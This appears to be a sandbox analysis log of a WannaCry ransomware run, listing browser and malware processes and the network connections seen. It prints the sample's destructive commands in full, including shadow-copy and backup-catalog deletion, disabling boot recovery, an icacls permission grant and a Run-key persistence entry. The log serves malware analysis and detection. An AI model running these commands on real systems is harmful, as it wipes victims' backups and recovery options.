"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4212 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3068 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5752 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5752 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5976 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6308 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6492 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6584 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6608 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5384 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6756 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6672 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3280 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6924 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3104 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3964 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6088 /prefetch:8
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1956 -parentBuildID 20240401114208 -prefsHandle 1884 -prefMapHandle 1876 -prefsLen 23681 -prefMapSize 244705 -appDir "C:\Program Files\Mozilla Firefox\browser" - {be1fb95a-b8b5-4aa7-8063-29d4affe834b} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2364 -parentBuildID 20240401114208 -prefsHandle 2356 -prefMapHandle 2352 -prefsLen 23717 -prefMapSize 244705 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f493d37-00e9-4266-95b5-b7fc3348c352} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3304 -childID 1 -isForBrowser -prefsHandle 3040 -prefMapHandle 3160 -prefsLen 23858 -prefMapSize 244705 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d001909e-d840-43cb-b340-4d5f38aada07} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4220 -childID 2 -isForBrowser -prefsHandle 4212 -prefMapHandle 2664 -prefsLen 29091 -prefMapSize 244705 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2e4f0e5-67b8-416b-962c-37d749ad1572} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4640 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4808 -prefMapHandle 4804 -prefsLen 29198 -prefMapSize 244705 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a226775-ec1d-4c44-9d82-aa3e2d3fa8a7} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5108 -childID 3 -isForBrowser -prefsHandle 5168 -prefMapHandle 5164 -prefsLen 27051 -prefMapSize 244705 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb85a128-4b62-4e57-8f6f-2511ade2f1e9} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5300 -childID 4 -isForBrowser -prefsHandle 5308 -prefMapHandle 5312 -prefsLen 27051 -prefMapSize 244705 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f85381f-0a44-4d99-96a4-5529f09fc3eb} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5504 -childID 5 -isForBrowser -prefsHandle 5584 -prefMapHandle 5580 -prefsLen 27051 -prefMapSize 244705 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {77d0d59f-85b3-4587-a5cf-6d11521d6be2} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5336 -childID 6 -isForBrowser -prefsHandle 5344 -prefMapHandle 5348 -prefsLen 27051 -prefMapSize 244705 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f3bcca88-6e90-4168-b4ff-186017a7b7e6} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4728 -childID 7 -isForBrowser -prefsHandle 4344 -prefMapHandle 4656 -prefsLen 27838 -prefMapSize 244705 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {918ba5f5-4b91-4d7b-aec5-179f4ce45c1b} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" tab
C:\Users\Admin\Downloads\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
"C:\Users\Admin\Downloads\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h .
C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 264731731281055.bat
C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
C:\Windows\SysWOW64\attrib.exe
attrib +h +s F:\$RECYCLE
C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @[email protected] vs
C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
C:\Users\Admin\Downloads\Ransomware.WannaCry\TaskData\Tor\taskhsvc.exe
TaskData\Tor\taskhsvc.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "pdyantnatxy168" /t REG_SZ /d "\"C:\Users\Admin\Downloads\Ransomware.WannaCry\tasksche.exe\"" /f
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "pdyantnatxy168" /t REG_SZ /d "\"C:\Users\Admin\Downloads\Ransomware.WannaCry\tasksche.exe\"" /f
C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1492 -childID 8 -isForBrowser -prefsHandle 4608 -prefMapHandle 3088 -prefsLen 27878 -prefMapSize 244705 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b6cca616-b67b-4cb3-996e-0a74667da3a3} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5704 -childID 9 -isForBrowser -prefsHandle 5624 -prefMapHandle 5636 -prefsLen 27878 -prefMapSize 244705 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ecd0fff-7df6-4a12-ab9a-e281c5b6c93f} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5672 -childID 10 -isForBrowser -prefsHandle 6836 -prefMapHandle 6832 -prefsLen 27878 -prefMapSize 244705 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ce9bb3c-5707-4de5-843d-4f1bdee16451} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6200 -childID 11 -isForBrowser -prefsHandle 5020 -prefMapHandle 4536 -prefsLen 27878 -prefMapSize 244705 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e49f65c3-4fb9-4ea8-a939-b383688d5696} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" tab
C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkappexec.microsoft.com | udp |
| GB | 172.165.69.228:443 | checkappexec.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 228.69.165.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| GB | 172.217.169.10:443 | ogads-pa.googleapis.com | udp |
| GB | 172.217.169.10:443 | ogads-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.187.206:443 | play.google.com | udp |
| GB | 142.250.187.206:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| N/A | 127.0.0.1:50041 | tcp | |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 115.230.163.35.in-addr.arpa | udp |
| N/A | 127.0.0.1:50048 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | 228.179.250.142.in-addr.arpa | udp |
| GB | 142.250.179.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 72.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nav.smartscreen.microsoft.com | udp |
| GB | 13.87.96.169:443 | nav.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | data-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | 169.96.87.13.in-addr.arpa | udp |
| GB | 13.87.96.169:443 | data-edge.smartscreen.microsoft.com | tcp |
| GB | 13.87.96.169:443 | data-edge.smartscreen.microsoft.com | tcp |
| GB | 13.87.96.169:443 | data-edge.smartscreen.microsoft.com | tcp |
| GB | 92.123.128.173:443 | www.bing.com | tcp |
| GB | 92.123.128.173:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 173.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 92.123.128.167:443 | r.bing.com | tcp |
| GB | 92.123.128.167:443 | r.bing.com | tcp |
| GB | 92.123.128.171:443 | r.bing.com | tcp |
| GB | 92.123.128.171:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | 167.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| IE | 20.190.159.2:443 | login.microsoftonline.com | tcp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| GB | 92.123.128.171:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | en.softonic.com | udp |
| US | 151.101.129.91:443 | en.softonic.com | tcp |
| US | 151.101.129.91:443 | en.softonic.com | tcp |
| US | 8.8.8.8:53 | assets.sftcdn.net | udp |
| US | 8.8.8.8:53 | sdk.privacy-center.org | udp |
| US | 151.101.1.91:443 | assets.sftcdn.net | tcp |
| US | 151.101.1.91:443 | assets.sftcdn.net | tcp |
| US | 151.101.1.91:443 | assets.sftcdn.net | tcp |
| US | 151.101.1.91:443 | assets.sftcdn.net | tcp |
| US | 8.8.8.8:53 | images.sftcdn.net | udp |
| GB | 18.165.160.104:443 | sdk.privacy-center.org | tcp |
| US | 151.101.193.91:443 | images.sftcdn.net | tcp |
| US | 8.8.8.8:53 | 91.129.101.151.in-addr.arpa | udp |
| US | 151.101.193.91:443 | images.sftcdn.net | tcp |
| US | 151.101.193.91:443 | images.sftcdn.net | tcp |
| US | 151.101.193.91:443 | images.sftcdn.net | tcp |
| US | 151.101.193.91:443 | images.sftcdn.net | tcp |
| US | 151.101.193.91:443 | images.sftcdn.net | tcp |
| US | 151.101.193.91:443 | images.sftcdn.net | udp |
| US | 8.8.8.8:53 | 91.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.160.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.193.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.39.65.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | notix.io | udp |
| NL | 139.45.197.253:443 | notix.io | tcp |
| US | 8.8.8.8:53 | 253.197.45.139.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bing.com | udp |
| US | 204.79.197.200:443 | bing.com | tcp |
| US | 8.8.8.8:53 | api.privacy-center.org | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| GB | 13.224.81.72:443 | api.privacy-center.org | tcp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | www.clarity.ms | udp |
